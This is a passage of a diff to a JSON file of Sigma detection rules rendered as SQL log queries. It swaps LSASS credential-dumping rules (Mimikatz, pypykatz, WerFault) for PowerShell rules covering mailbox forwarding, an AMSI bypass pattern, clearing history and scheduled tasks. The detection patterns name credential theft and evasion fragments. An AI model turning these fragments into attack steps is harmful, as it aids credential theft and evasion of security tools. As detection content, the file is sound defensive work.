LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" ], - "filename": "proc_access_win_rare_proc_access_lsass.yml" + "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", - "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction", + "id": "dddfebae-c46f-439c-af7a-fdb6bde90218", + "status": "test", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_syncappvpublishingserver_exe.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", + "title": "NTFS Alternate Data Stream", + "id": "8c521530-5169-495d-a199-0a3a881ad24e", "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "description": "Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.", + "author": "Sami Ruohonen", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1564.004", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_ntfs_ads_access.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", + "title": "Powershell Create Scheduled Task", + "id": "363eccc0-279a-4ccf-a3ab-24c2e63b11fb", "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code", + "author": "frack113", "tags": [ - "attack.t1548" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-ScheduledTaskAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskTrigger%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskPrincipal%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTaskSettingsSet%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-ScheduledTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-ScheduledTask%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Invoke-CimMethod%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PS\\_ScheduledTask%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSpace%' ESCAPE '\\' AND ScriptBlockText LIKE '%Root\\\\Microsoft\\\\Windows\\\\TaskScheduler%' ESCAPE '\\')))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_cmdlet_scheduled_task.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "Powershell LocalAccount Manipulation", + "id": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Disable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Rename-LocalUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-LocalUser%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_localuser.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Clear PowerShell History - PowerShell", + "id": "26b692dc-1722-49b2-b496-a8258aa6371d", + "status": "experimental", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Unlikely, since these tools shouldn't access lsass.exe at all" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND ScriptBlockText LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%SaveNothing%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%del%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_clear_powershell_history.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "AMSI Bypass Pattern Assembly GetType", + "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1562.001", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", + "title": "Security Software Discovery by Powershell", + "id": "904e8e61-8edf-4350-b59c-b905fc8e810c", "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.discovery", + "attack.t1518.001" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%get-process%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Description%' ESCAPE '\\' AND ScriptBlockText LIKE '%-like%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\"%virus%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%carbonblack%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%defender%\"%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"%cylance%\"%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_security_software_discovery.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy", + "id": "bbb9495b-58fc-4016-b9df-9a3a1b67ca82", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detetcts PowerShell activity in which Get-Addefaultdomainpasswordpolicy is used to get the default password policy for an Active Directory domain.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.discovery", + "attack.t1201" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-AdDefaultDomainPasswordPolicy%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + "filename": "posh_ps_susp_get_addefaultdomainpasswordpolicy.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "test", + "description": "Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework", + "author": "Florian Roth (Nextron Systems), Perez Diego (@darkquassar), Tuan Le (NCSGroup)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%System.Reflection.Assembly.Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%[Reflection.Assembly]::Load($%' ESCAPE '\\' OR ScriptBlockText LIKE '%System.Reflection.AssemblyName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.AssemblyBuilderAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Reflection.Emit.CustomAttributeBuilder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.UnmanagedType%' ESCAPE '\\' OR ScriptBlockText LIKE '%Runtime.InteropServices.DllImportAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%SuspendThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%rundll32%' ESCAPE '\\'))" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_keywords.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Recon Information for Export with PowerShell", + "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.collection", + "attack.t1119" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' 